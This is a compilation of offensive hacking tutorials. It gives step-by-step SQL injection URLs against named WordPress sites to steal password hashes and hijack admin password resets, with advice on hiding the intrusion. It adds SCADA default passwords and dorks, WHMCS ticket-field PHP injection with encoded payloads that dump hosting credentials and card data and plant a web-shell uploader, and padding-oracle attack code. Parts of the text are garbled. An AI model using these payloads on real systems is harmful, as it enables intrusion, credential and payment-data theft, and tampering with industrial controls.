Code : http://masaru.ikeda.me/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3, 4,5,concat(user_login,0x3a,user_pass),?7,8,9,10,11,12+from+wp_users-- > im going to get the user name and the hashed password .. > (point to be noted here .. im using concat here .. u can also use group_concat to get all the users.. > again .. that would be ur knowledge how u use sqli) > now .. we all know that wordpress hashes belong to the category MD5(wordpress).. (different from simple MD5) > and are very hard to crack .. > but if ur mad .. u should think out of the box .. > so now follow the steps .. a) go to the login page of of wordpress site .. in my case that would be .. Code : http://masaru.ikeda.me/wp-login.php b) click on Lost your password ? c) now the wordpress will ask me for the username or email .. for which i want to reset the password .. in my case that is 'masaru' .. so go ahead and enter the username .. d) now look closely .. it says .. "Check your e-mail for the confirmation link." e) now what wordpress does actually .. it sends an activation key to the email address of that user .. and it sets the value of activation key in the database aswell .. what u have to do is just to get that key .. f) so now im going to change my URL to this .. to get the activation key .. Code : http://masaru.ikeda.me/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3, 4,5,concat(user_login,0x3a,user_activa?tion_key),7,8,9,10,11,12+from+wp_users-- NOTE: we got the activation key here .. u should note it down somewhere .. g) Now .. finally all we have to do is .. without going to the email address .. reset the password .. for that im going to add this to my URL .. Code : wp-login.php?action=rp&key=KEYHERE&login=USER NAME HERE
and im going to replace the KEYHERE with the activation key i got .. and the USERNAME HERE with the username .. which in my case is 'masaru' .. so my URL will be .. Code : http://masaru.ikeda.me/wp- login.php?action=rp&key=cFn9vDsT3X2ZnW8vEda6&login=masaru and VOILA .. the wordpress will ask u for ur new password .. now go the login page again .. and try the new password .. and there u go .. u got access to the panel .. now u know how to shell the wordpress site .. don't u ?? Trick for those .. who are actually MAD: 1) Now to chk quickly if a website is using the latest version 3.4.2 or previous versions .. > goto the login page and see .. if there is an option there to go back to the main page of the blog.. > like in my case see the option .. <- Back to Digital Way of Living then this is not 3.4.2 ... > if u don't see this option .. then it is 3.4.2 .. this trick is not legit .. i figured it out .. and is working for me .. 2) once u have shelld the website .. > get the database details .. > use any database connector .. > go to the table .. wp_user .. and in the column wp_pass .. > replace the hash with the one u got in the very beginning .. > the actual hash of the admin .. now the password will be again what it was before .. > as nothing happened .. admin will never know what hit 'em .. Now .. in the latest version .. 3.4.2 .. what happens actually .. that after confirming the activation key wordpress don't let you choose a new password .. rather . it actually sends u a random password on ur Email ..
How To Hack WordPress Websites using SQL Injection: HackingTutorial 5 comments Tutorial:How To Hack WordPress Websites using SQL injection What is Wordpress?? WordPressisa free and opensource bloggingtool anda contentmanagementsyste (CMS) basedon PHP andMySQL. It has many featuresincludingaplug-inarchitecture andatemplate system.WordPress iscurrentlythe mostpopularbloggingsysteminuse onthe Web.It wasfirstreleasedonMay 27, 2003, by foundersMattMullenweg. Nowletsmove onto a hackingwebsite.Ihave usedhere all-video-gallery(WordPressplugin)Sqli Vulnerability.. 1>Firstwe will find a Targetusinga Googledork inurl:all-video-gallery/config.php?vid= click on image for better preview....... 2>Open any website....Inmycase its juangrial.com.
3>now letsdoa sql injection....copythe exploitcode thenhitenterthensee the Magic...:) ExploitCode forfindingusename &password:http://site.com/wp-content/plugins/all-video- gallery/config.php?vid=1&pid=11&pid=- 1+union+select+1,2,3,4,group_concat(user_login,0x3a,user_pass),6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38, 39,40,41+from+wp_users--
You can also try this.......well Bothwill workthe same......... ExploitCode forfindingusename &email:http://site.com/wp-content/plugins/all-video- gallery/config.php?vid=1&pid=11&pid=- 1+union+select+1,2,3,4,group_concat(user_login,0x3a,user_email),6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38, 39,40,41+from+wp_users- - 4>We Got adminEmail......NowLet!sresetit..... For that GO to:- http://site.com/wp-admin ORhttps://site.com/wp-login.php "Thenclick onLost Password"
5>Enter the Email we Got IN earliersteps... 6>Now come back and go to activationtable.... * ExploitCode foractivationKey:http://site.com/wp-content/plugins/all-video- gallery/config.php?vid=1&pid=11&pid=- 1+union+select+1,2,3,4,group_concat(user_login,user_activation_key,0x3b),6,7,8,9,10,
11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38, 39,40,41+from+wp_users-- 7>yeah!!!we gotwhatwe neednowletschange the adminpassword... goto:http://site.com/wp-login.php?action=rp&key=resetkey&login=username
8> Nowopenhttp://site.com/wp-admin and Loginwithnewpassword..........xD
DNS Zone Transfer Vulnerability Exploit  Scan website with Acunetix Web Vulnerability Scanner.  If you get DNS zone transfer vulnerability
 Open command prompt (run>cmd)  do nslookup.  type > ns lookup  type > server <website name>
 C:> set type-any  C:> ls -d <website name>
Hacking SCADA Systems With the discovery of stuxnet and all the subsequent interest in industrial control systems it's worthwhile to learn a bit on how to exploit these for our own purposes. For now it's a copypaste of various information on ICS products. Eventually I will rewrite it as a fluent tutorial, but until then you can use this article as a starting point in your own research. Contents :-  Terminology  Default Passwords  Google Dorks  Vulnerabilities and Other Resources Terminology: PLC: Programmable Logic Controller RTU: Remote Terminal Unit HMI: Human-Machine Interface Default Passwords : These should always be your first try if you come across an HMI listed. Due to the fact that the amount of attention these systems have received has only been true recently many of these HMIs still have their defaults. These can be accessed using a web panel, telnet, or VNC. Links to support documents have been provided to familiarize yourself with these systems. Schneider Electrics : pcfactory:pcfactory loader:fwdownload ntpupdate:ntpupdate sysdiag:factorycast@schneider test:testingpw USER:USER USER:USERUSER webserver:webpages
fdrusers:sresurdf nic2212:poiuypoiuy nimrohs2212:qwertyqwerty nip2212:fcsdfcsd ftpuser:ftpuser noe77111_v500:RcSyyebczS AUTCSE:RybQRceeSd AUT_CSE:cQdd9debez target:RcQbRbzRyc Siemens Simatic : Administrator:100 Siemens WinCC : WinCCConnect:2WSXcder WinCCAdmin:2WSXcder WAGO : admin:wago Google Dorks: These will be added to as I go along, but are just a couple you can try out to search for HMIs. inurl:/plc/webvisu.htm "Miniweb on" "Control Functions" -filetype:pdf Vulnerabilities and Other Resources Vulnerabilities in some SCADA server softwares Metasploit Modules for SCADA-related Vulnerabilities SIMATIC HMI panels - some default Simatic HMIs you can play around with
WHMCS Hacking with Sumbit Ticket exploit Hi Mates ! Today we are going to learn, how to Hack WHMCS or you can say its submit ticket exploit ,through which we will we will get the cpanel username and password of hosting panel and website hosted on that whmcs. lets start step 1 : Get a website which provide hosting and find out the option " submit ticket" step 2 : now open submit ticket option and click on sales department step 3 : now we have to fill the following info like "name , email address, urgency put any random info is these fields and main thing is subject filed"
fill this code in subject field : {php}evaL(base64_decode('DQppbmNsdWRlKCdjb25maWd1cmF0aW9uLnBocCcpOw0KDQ okcXVlcnkgPSBteXNxbF9xdWVyeSgiU0VMRUNUICogRlJPTSB0YmxzZXJ2ZXJzIik7DQok dGV4dD0kdGV4dC4iXHJcbiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMgSE9TVCBST09UUyAj IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyNcclxuIjsNCndoaWxlKCR2ID0gbXlzcWxfZmV0Y2h fYXJyYXkoJHF1ZXJ5KSkgew0KDQokaXBhZGRyZXNzID0gJHZbJ2lwYWRkcmVzcyddOw 0KJHVzZXJuYW1lID0gJHZbJ3VzZXJuYW1lJ107DQokdHlwZSA9ICR2Wyd0eXBlJ107DQo kYWN0aXZlID0gJHZbJ2FjdGl2ZSddOw0KJGhvc3RuYW1lID0gJHZbJ2hvc3RuYW1lJ107DQ oNCg0KJHBhc3N3b3JkID0gZGVjcnlwdCAoJHZbJ3Bhc3N3b3JkJ10sICRjY19lbmNyeXB0aW 9uX2hhc2gpOw0KDQokdGV4dD0kdGV4dC4iVHlwZSAkdHlwZVxyXG4iOw0KJHRleHQ9J HRleHQuIkFjdGl2ZSAkYWN0aXZlXHJcbiI7DQokdGV4dD0kdGV4dC4iSG9zdG5hbWUgJG hvc3RuYW1lXHJcbiI7DQokdGV4dD0kdGV4dC4iSXAgJGlwYWRkcmVzc1xyXG4iOw0KJH RleHQ9JHRleHQuIlVzZXJuYW1lICR1c2VybmFtZVxyXG4iOw0KJHRleHQ9JHRleHQuIlBhc 3N3b3JkICRwYXNzd29yZFxyXG4qKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKio qKlxyXG4iOw0KDQoNCn0NCiR0ZXh0PSR0ZXh0LiJcclxuIyMjIyMjIyMjIyMjIyMjIyMjIyMj IyMjIyBIT1NUIFJPT1RTICMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjI1xyXG4iOw0KDQokd GV4dD0kdGV4dC4iXHJcbiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMgRG9tYWluIFJlc2VsbG VyICMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjI1xyXG4iOw0KDQokcXVlcnkgPSBteXNxbF9 xdWVyeSgiU0VMRUNUICogRlJPTSB0YmxyZWdpc3RyYXJzIik7DQoNCndoaWxlKCR2ID0 gbXlzcWxfZmV0Y2hfYXJyYXkoJHF1ZXJ5KSkgew0KDQokcmVnaXN0cmFyIAk9ICR2Wyd yZWdpc3RyYXInXTsNCiRzZXR0aW5nID0gJHZbJ3NldHRpbmcnXTsNCiR2YWx1ZSA9IGR lY3J5cHQgKCR2Wyd2YWx1ZSddLCAkY2NfZW5jcnlwdGlvbl9oYXNoKTsNCmlmICgkdmF sdWU9PSIiKSB7DQokdmFsdWU9MDsNCn0NCiRwYXNzd29yZCA9IGRlY3J5cHQgKCR2
WydwYXNzd29yZCddLCAkY2NfZW5jcnlwdGlvbl9oYXNoKTsNCiR0ZXh0PSR0ZXh0LiIkc mVnaXN0cmFyICRzZXR0aW5nICR2YWx1ZVxyXG4iOw0KfQ0KJHRleHQ9JHRleHQuIlxy XG4jIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIERvbWFpbiBSZXNlbGxlciAjIyMjIyMjIyMjIyMj IyMjIyMjIyMjIyMjIyNcclxuIjsNCg0KJHRleHQ9JHRleHQuIlxyXG4jIyMjIyMjIyMjIyMjIyMjI yMjIyMjIyMjIEZUUCArU01UUCAjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyNcclxuIjsNCgkk cXVlcnkgPSBteXNxbF9xdWVyeSgiU0VMRUNUICogRlJPTSB0Ymxjb25maWd1cmF0aW9uI HdoZXJlIHNldHRpbmc9J0ZUUEJhY2t1cEhvc3RuYW1lJyBvciBzZXR0aW5nPSdGVFBCYW NrdXBVc2VybmFtZScgb3IgIHNldHRpbmc9J0ZUUEJhY2t1cFBhc3N3b3JkJyBvciAgc2V0dGl uZz0nRlRQQmFja3VwRGVzdGluYXRpb24nIG9yICBzZXR0aW5nPSdTTVRQSG9zdCcgb3Ig IHNldHRpbmc9J1NNVFBVc2VybmFtZScgb3Igc2V0dGluZz0nU01UUFBhc3N3b3JkJyBvciA gc2V0dGluZz0nU01UUFBvcnQnIik7DQp3aGlsZSgkdiA9IG15c3FsX2ZldGNoX2FycmF5KCR xdWVyeSkpIHsNCiR2YWx1ZSA9JHZbJ3ZhbHVlJ107DQppZiAoJHZhbHVlPT0iIikgew0KJH ZhbHVlPTA7DQp9DQoNCiR0ZXh0PSR0ZXh0LiR2WydzZXR0aW5nJ10uIiAiLiR2YWx1ZS 4iXHJcbiIgOw0KCQ0KfQ0KCQ0KCQ0KCSR0ZXh0PSR0ZXh0LiJcclxuIyMjIyMjIyMjIyMjI yMjIyMjIyMjIyMjIyBGVFAgK1NNVFAgIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjXHJcbiI 7DQoJDQoJCSR0ZXh0PSR0ZXh0LiJcclxuIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyBDbGllbn QgUjAwdHMgIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjXHJcbiI7DQogJHF1ZXJ5ID0gbXlz cWxfcXVlcnkoIlNFTEVDVCAqIEZST00gdGJsaG9zdGluZyB3aGVyZSB1c2VybmFtZSA9ICd yb290JyBvciB1c2VybmFtZSA9ICdBZG1pbicgb3IgdXNlcm5hbWUgPSAnYWRtaW4nIG9yIH VzZXJuYW1lID0gJ0FkbWluaXN0cmF0b3InIG9yICB1c2VybmFtZSA9ICdhZG1pbmlzdHJhd G9yJyBvcmRlciBieSBkb21haW5zdGF0dXMiKTsNCg0KIA0KICAgIHdoaWxlKCR2ID0gbXlz cWxfZmV0Y2hfYXJyYXkoJHF1ZXJ5KSkgew0KICAgJHRleHQ9JHRleHQuIlxyXG5Eb21ha W4gIi4kdlsnZG9tYWluJ10uIlxyXG5JUCAiLiR2WydkZWRpY2F0ZWRpcCddLiJcclxuVXNlc m5hbWUgIi4kdlsndXNlcm5hbWUnXS4iXHJcblBhc3N3b3JkICIuZGVjcnlwdCAoJHZbJ3Bhc3 N3b3JkJ10sICRjY19lbmNyeXB0aW9uX2hhc2gpLiJcclxuRG9tYWluc3RhdHVzIi4kdlsnZG9tY Wluc3RhdHVzJ10uIlxyXG4iOw0KICAgIH0NCgkkdGV4dD0kdGV4dC4iXHJcbiMjIyMjIyMjI yMjIyMjIyMjIyMjIyMjIyMgQ2xpZW50IFIwMHRzICMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy MjI1xyXG4iOw0KCQ0KCQkkdGV4dD0kdGV4dC4iXHJcbiMjIyMjIyMjIyMjIyMjIyMjIyMjIy MjIyMgQ2xpZW50IEhPU1QgIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjXHJcbiI7DQogJHF 1ZXJ5ID0gbXlzcWxfcXVlcnkoIlNFTEVDVCAqIEZST00gdGJsaG9zdGluZyB3aGVyZSBkb2 1haW5zdGF0dXM9J0FjdGl2ZSciKTsNCg0KIA0KICAgIHdoaWxlKCR2ID0gbXlzcWxfZmV0 Y2hfYXJyYXkoJHF1ZXJ5KSkgew0KCWlmICgoJHZbJ3VzZXJuYW1lJ10gKSBhbmQgKCR2 WydwYXNzd29yZCddKSkgew0KICAgJHRleHQ9JHRleHQuIlxyXG5Eb21haW4gIi4kdlsnZG9 tYWluJ10uIlxyXG5JUCAiLiR2WydkZWRpY2F0ZWRpcCddLiJcclxuVXNlcm5hbWUgIi4kdls ndXNlcm5hbWUnXS4iXHJcblBhc3N3b3JkICIuZGVjcnlwdCAoJHZbJ3Bhc3N3b3JkJ10sICRj Y19lbmNyeXB0aW9uX2hhc2gpLiJcclxuRG9tYWluc3RhdHVzIi4kdlsnZG9tYWluc3RhdHVzJ 10uIlxyXG4iOw0KICAgIH0NCgl9DQoJJHRleHQ9JHRleHQuIlxyXG4jIyMjIyMjIyMjIyMjIy MjIyMjIyMjIyMjIENsaWVudCBIT1NUICMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjI1xyXG4i Ow0KCQ0KCQ0KCQkkdGV4dD0kdGV4dC4iXHJcbiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy MgQ2xpZW50IENDICMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjI1xyXG4iOw0KCSRxdWVye SA9IG15c3FsX3F1ZXJ5KCJTRUxFQ1QgKiBGUk9NIGB0YmxjbGllbnRzYCBXSEVSRSBjY XJkdHlwZSA8PiAnJyBvcmRlciBieSBpc3N1ZW51bWJlciBkZXNjIik7DQoNCgkNCndoaWxl KCR2ID0gbXlzcWxfZmV0Y2hfYXJyYXkoJHF1ZXJ5KSkgew0KJGNjaGFzaCA9IG1kNSggJ
GNjX2VuY3J5cHRpb25faGFzaC4kdlsnMCddKTsNCiRzPSAgbXlzcWxfcXVlcnkoInNlbGVjd CBjYXJkdHlwZSxBRVNfREVDUllQVChjYXJkbnVtLCd7JGNjaGFzaH0nKSBhcyBjYXJkbn VtLEFFU19ERUNSWVBUKGV4cGRhdGUsJ3skY2NoYXNofScpIGFzIGV4cGRhdGUsQUV TX0RFQ1JZUFQoaXNzdWVudW1iZXIsJ3skY2NoYXNofScpIGFzIGlzc3VlbnVtYmVyLEFF U19ERUNSWVBUKHN0YXJ0ZGF0ZSwneyRjY2hhc2h9JykgYXMgc3RhcnRkYXRlICBGUk 9NIGB0YmxjbGllbnRzYCB3aGVyZSBpZD0nIi4kdlsnMCddLiInIiApOw0KDQokdjI9bXlzcW xfZmV0Y2hfYXJyYXkoJHMpOw0KDQogICR0ZXh0PSR0ZXh0LiJcclxuIi4kdjJbMF0uInwiLi R2MlsxXS4ifCIuJHYyWzJdLiJ8Ii4kdjJbM10uInwiLiR2Mls0XTsNCn0NCg0KDQogICANCiA NCgkkdGV4dD0kdGV4dC4iXHJcbiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMgQ2xpZW50IEN DICMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjI1xyXG4iOw0KCQ0KCWVjaG8oJHRleHQpOw =='));exit;{/php} ______________________________________________________________________________ and scroll down fill the Captcha click the submit button we will be redirected to next page where it will show cpanel username and password boom ! you have cpanel usernames and passwords of hosting panel,website hosted on that server if you are lucky , you may also get the FTP and SMTP passwords too !
ok it was all about the the cpanel,FTP and SMTP passwords if whmcs dont have any website hosted on it you wont get anything then ???????? dont be sad :) we have one more trick and this will help you to upload the shell on whmcs website :) how ??? lets move :) come back to the submit ticket page put any random info in email,name and urgency field main step is to put the php code in subject field this time we are going to put the php code, if it got executed successfully we will get a uploader on the website through which we will be able to upload shell on the website so lets start fill the any random info in other fields and put this php code in subject field {php}eval(base64_decode('JGM9YmFzZTY0X2RlY29kZSgiUEQ5d2FIQU5DbWxtS0dsemMy VjBLQ1JmVUU5VFZGc25VM1ZpYldsMEoxMHBLWHNOQ2lBZ0lDQWtabWxzWldScGNp QTlJQ0lpT3lBTkNpQWdJQ0FrYldGNFptbHNaU0E5SUNjeU1EQXdNREF3SnpzTkNnMEtJQ 0FnSUNSMWMyVnlabWxzWlY5dVlXMWxJRDBnSkY5R1NVeEZVMXNuYVcxaFoyVW5Y VnNuYm1GdFpTZGRPdzBLSUNBZ0lDUjFjMlZ5Wm1sc1pWOTBiWEFnUFNBa1gwWkpU RVZUV3lkcGJXRm5aU2RkV3lkMGJYQmZibUZ0WlNkZE93MEtJQ0FnSUdsbUlDaHBjM05 sZENna1gwWkpURVZUV3lkcGJXRm5aU2RkV3lkdVlXMWxKMTBwS1NCN0RRb2dJQ0Fn SUNBZ0lDUmhZbTlrSUQwZ0pHWnBiR1ZrYVhJdUpIVnpaWEptYVd4bFgyNWhiV1U3RFF vZ0lDQWdJQ0FnSUVCdGIzWmxYM1Z3Ykc5aFpHVmtYMlpwYkdVb0pIVnpaWEptYVd4b FgzUnRjQ3dnSkdGaWIyUXBPdzBLSUNBTkNtVmphRzhpUEdObGJuUmxjajQ4WWo1RWIy NWxJRDA5UGlBa2RYTmxjbVpwYkdWZmJtRnRaVHd2WWo0OEwyTmxiblJsY2o0aU93ME tmUTBLZlEwS1pXeHpaWHNOQ21WamFHOG5EUW84Wm05eWJTQnRaWFJvYjJROUlsQl BVMVFpSUdGamRHbHZiajBpSWlCbGJtTjBlWEJsUFNKdGRXeDBhWEJoY25RdlptOXliUz FrWVhSaElqNDhhVzV3ZFhRZ2RIbHdaVDBpWm1sc1pTSWdibUZ0WlQwaWFXMWhaMlV pUGp4cGJuQjFkQ0IwZVhCbFBTSlRkV0p0YVhRaUlHNWhiV1U5SWxOMVltMXBkQ0lnZ
G1Gc2RXVTlJbE4xWW0xcGRDSStQQzltYjNKdFBpYzdEUXA5RFFvL1BpQT0iKTsNCiRm aWNoaWVyID0gZm9wZW4oJ2Rvd25sb2Fkcy9pbmRleHgucGhwJywndycpOw0KZndyaXRlK CRmaWNoaWVyLCAkYyk7DQpmY2xvc2UoJGZpY2hpZXIpOw=='));exit;{/php} ______________________________________________________________________________ fill the captcha click enter, now first of all , have a look on the submit ticket url for example http://www.website.com/client/submitticket.php so to get the uploader replace the submitticket.php with downloads/indexx.php remember its indexx.php,when code will execute , it will create indexx.php and its uploader so open the url http://www.website.com/client/downloads/indexx.php you will see file upload option ! browse the shell andclickupload afteruploadingshell opnthe url http://www.website.com/client/downloads/shell_name.php hell yeah owned:D
WHMCS Auto Exploiter  Take WHMCS auto exploiter php script.  Upload it to some php server.  In Google Dork make your own dork and click exploit like : Dorks : inurl:submitticket.php site:.com inurl:submitticket.php site:.net inurl:submitticket.php site:.us inurl:submitticket.php site:.eu inurl:submitticket.php site:.org inurl:submitticket.php site:.uk intext:”Powered by WHMCompleteSolution” intext:”Powered by WHMCompleteSolution” inurl:clientarea.php inurl:announcements.php intext:”WHMCompleteSolution” intext:”Powered by WHMCS”  Crack hash.  Go to site and open admin panel and make successful login.
Oracle Padding Attack Using Brup Suite Requiements :  MicrosoftSQlServer 2008 R2  Brup Suit Professionalv1.4.07  exe.bat[ Save it in notepad and rename as exe.bat ] @echo off cmd  padBuster.pl [ Save it in notepad and rename as padBuster.pl ] #!/usr/bin/perl # # PadBuster v0.3.3 - Automated script for performing Padding Oracle attacks # Brian Holyfield - Gotham Digital Science (labs@gdssecurity.com) # # Credits to J.Rizzo and T.Duong for providing proof of concept web exploit # techniques and S.Vaudenay for initial discovery of the attack. Credits also # to James M. Martin (research@esptl.com) for sharing proof of concept exploit # code for performing various brute force attack techniques, and wireghoul (Eldar # Marcussen) for making code quality improvements. # use LWP::UserAgent; use strict; use warnings; use Getopt::Std; use MIME::Base64;
use URI::Escape; use Getopt::Long; use Time::HiRes qw( gettimeofday ); use Compress::Zlib; use Crypt::SSLeay; # Set defaults with $variable = value my $logFiles; my $post; my $encoding = 0; my $headers; my $cookie; my $error; my $prefix; my $intermediaryInput; my $cipherInput; my $plainTextInput; my $encodedPlainTextInput; my $noEncodeOption; my $superVerbose; my $proxy; my $proxyAuth; my $noIv; my $auth; my $resumeBlock; my $interactive = 0;
my $bruteForce; my $ignoreContent; my $useBody; my $verbose; GetOptions( "log" => $logFiles, "post=s" => $post, "encoding=s" => $encoding, "headers=s" => $headers, "cookies=s" => $cookie, "error=s" => $error, "prefix=s" => $prefix, "intermediate=s" => $intermediaryInput, "ciphertext=s" => $cipherInput, "plaintext=s" => $plainTextInput, "encodedtext=s" => $encodedPlainTextInput, "noencode" => $noEncodeOption, "veryverbose" => $superVerbose, "proxy=s" => $proxy, "proxyauth=s" => $proxyAuth, "noiv" => $noIv, "auth=s" => $auth, "resume=s" => $resumeBlock, "interactive" => $interactive, "bruteforce" => $bruteForce, "ignorecontent" => $ignoreContent,
"usebody" => $useBody, "verbose" => $verbose); print "n+-------------------------------------------+n"; print "| PadBuster - v0.3.3 |n"; print "| Brian Holyfield - Gotham Digital Science |n"; print "| labs@gdssecurity.com |n"; print "+-------------------------------------------+n"; if ($#ARGV < 2) { die " Use: padBuster.pl URL EncryptedSample BlockSize [options] Where: URL = The target URL (and query string if applicable) EncryptedSample = The encrypted value you want to test. Must also be present in the URL, PostData or a Cookie BlockSize = The block size being used by the algorithm Options: -auth [username:password]: HTTP Basic Authentication -bruteforce: Perform brute force against the first block -ciphertext [Bytes]: CipherText for Intermediate Bytes (Hex-Encoded) -cookies [HTTP Cookies]: Cookies (name1=value1; name2=value2) -encoding [0-4]: Encoding Format of Sample (Default 0) 0=Base64, 1=Lower HEX, 2=Upper HEX 3=.NET UrlToken, 4=WebSafe Base64
-encodedtext [Encoded String]: Data to Encrypt (Encoded) -error [Error String]: Padding Error Message -headers [HTTP Headers]: Custom Headers (name1::value1;name2::value2) -interactive: Prompt for confirmation on decrypted bytes -intermediate [Bytes]: Intermediate Bytes for CipherText (Hex-Encoded) -log: Generate log files (creates folder PadBuster.DDMMYY) -noencode: Do not URL-encode the payload (encoded by default) -noiv: Sample does not include IV (decrypt first block) -plaintext [String]: Plain-Text to Encrypt -post [Post Data]: HTTP Post Data String -prefix [Prefix]: Prefix bytes to append to each sample (Encoded) -proxy [address:port]: Use HTTP/S Proxy -proxyauth [username:password]: Proxy Authentication -resume [Block Number]: Resume at this block number -usebody: Use response body content for response analysis phase -verbose: Be Verbose -veryverbose: Be Very Verbose (Debug Only) ";} # Ok, if we've made it this far we are ready to begin.. my $url = $ARGV[0]; my $sample = $ARGV[1]; my $blockSize = $ARGV[2]; if ($url eq "" || $sample eq "" || $blockSize eq "") {
print "nERROR: The URL, EncryptedSample and BlockSize cannot be null.n"; exit(); } # Hard Coded Inputs #$post = ""; #$sample = ""; my $method = $post ? "POST" : "GET"; # These are file related variables my $dirName = "PadBuster." . &getTime("F"); my $dirSlash = "/"; my $dirCmd = "mkdir "; if (defined($ENV{'OS'})) { if ($ENV{OS} =~ /Windows/) { $dirSlash = ""; $dirCmd = "md "; } } my $dirExists = 0; my $printStats = 0; my $requestTracker = 0; my $timeTracker = 0; if ($encoding < 0 || $encoding > 4) {
print "nERROR: Encoding must be a value between 0 and 4n"; exit(); } my $encodingFormat = $encoding ? $encoding : 0; my $encryptedBytes = $sample; my $totalRequests = 0; # See if the sample needs to be URL decoded, otherwise don't (the plus from B64 will be a problem) if ($sample =~ /%/) { $encryptedBytes = &uri_unescape($encryptedBytes) } # Prep the sample for regex use $sample = quotemeta $sample; # Now decode $encryptedBytes = &myDecode($encryptedBytes, $encodingFormat); if ( (length($encryptedBytes) % $blockSize) > 0) { print "nERROR: Encrypted Bytes must be evenly divisible by Block Size ($blockSize)n"; print " Encrypted sample length is ".int(length($encryptedBytes)).". Double check the Encoding and Block Size.n"; exit(); }
# If no IV, then append nulls as the IV (only if decrypting) if ($noIv && !$bruteForce && !$plainTextInput) { $encryptedBytes = "x00" x $blockSize . $encryptedBytes; } # PlainTextBytes is where the complete decrypted sample will be stored (decrypt only) my $plainTextBytes; # This is a bool to make sure we know where to replace the sample string my $wasSampleFound = 0; # ForgedBytes is where the complete forged sample will be stored (encrypt only) my $forgedBytes; # Isolate the IV into a separate byte array my $ivBytes = substr($encryptedBytes, 0, $blockSize); # Declare some optional elements for storing the results of the first test iteration # to help the user if they don't know what the padding error looks like my @oracleCantidates; my $oracleSignature = ""; my %oracleGuesses; my %responseFileBuffer; # The block count should be the sample divided by the blocksize my $blockCount = int(length($encryptedBytes)) / int($blockSize);
if (!$bruteForce && !$plainTextInput && $blockCount < 2) { print "nERROR: There is only one block. Try again using the -noiv option.n"; exit(); } # The attack works by sending in a real cipher text block along with a fake block in front of it # You only ever need to send two blocks at a time (one real one fake) and just work through # the sample one block at a time # First, re-issue the original request to let the user know if something is potentially broken my ($status, $content, $location, $contentLength) = &makeRequest($method, $url, $post, $cookie); &myPrint("nINFO: The original request returned the following",0); &myPrint("[+] Status: $status",0); &myPrint("[+] Location: $location",0); &myPrint("[+] Content Length: $contentLengthn",0); &myPrint("[+] Response: $contentn",1); $plainTextInput = &myDecode($encodedPlainTextInput,$encodingFormat) if $encodedPlainTextInput; if ($bruteForce) { &myPrint("INFO: Starting PadBuster Brute Force Mode",0); my $bfAttempts = 0;
print "INFO: Resuming previous brute force at attempt $resumeBlockn" if $resumeBlock; # Only loop through the first 3 bytes...this should be enough as it # requires 16.5M+ requests my @bfSamples; my $sampleString = "x00" x 2; for my $c (0 ... 255) { substr($sampleString, 0, 1, chr($c)); for my $d (0 ... 255) { substr($sampleString, 1, 1, chr($d)); push (@bfSamples, $sampleString); } } foreach my $testVal (@bfSamples) { my $complete = 0; while ($complete == 0) { my $repeat = 0; for my $b (0 ... 255) { $bfAttempts++; if ( $resumeBlock && ($bfAttempts < ($resumeBlock - ($resumeBlock % 256)+1)) ) { #SKIP } else {
my $testBytes = chr($b).$testVal; $testBytes .= "x00" x ($blockSize-3); my $combinedBf = $testBytes; $combinedBf .= $encryptedBytes; $combinedBf = &myEncode($combinedBf, $encoding); # Add the Query String to the URL my ($testUrl, $testPost, $testCookies) = &prepRequest($url, $post, $cookie, $sample, $combinedBf); # Issue the request my ($status, $content, $location, $contentLength) = &makeRequest($method, $testUrl, $testPost, $testCookies); my $signatureData = "$statust$contentLengtht$location"; $signatureData = "$statust$contentLengtht$locationt$content" if $useBody; if ($oracleSignature eq "") { &myPrint("[+] Starting response analysis...n",0) if ($b ==0); $oracleGuesses{$signatureData}++; $responseFileBuffer{$signatureData} = "Status: $statusnLocation: $locationnContent-Length: $contentLengthnContent:n$content"; if ($b == 255) { &myPrint("*** Response Analysis Complete ***n",0); &determineSignature();
$printStats = 1; $timeTracker = 0; $requestTracker = 0; $repeat = 1; $bfAttempts = 0; } } if ($oracleSignature ne "" && $oracleSignature ne $signatureData) { &myPrint("nAttempt $bfAttempts - Status: $status - Content Length: $contentLengthn$testUrln",0); &writeFile("Brute_Force_Attempt_".$bfAttempts.".txt", "URL: $testUrlnPost Data: $testPostnCookies: $testCookiesnnStatus: $statusnLocation: $locationnContent-Length: $contentLengthnContent:n$content"); } } } ($repeat == 1) ? ($complete = 0) : ($complete = 1); } } } elsif ($plainTextInput) { # ENCRYPT MODE &myPrint("INFO: Starting PadBuster Encrypt Mode",0); # The block count will be the plaintext divided by blocksize (rounded up) my $blockCount = int(((length($plainTextInput)+1)/$blockSize)+0.99); &myPrint("[+] Number of Blocks: ".$blockCount."n",0);
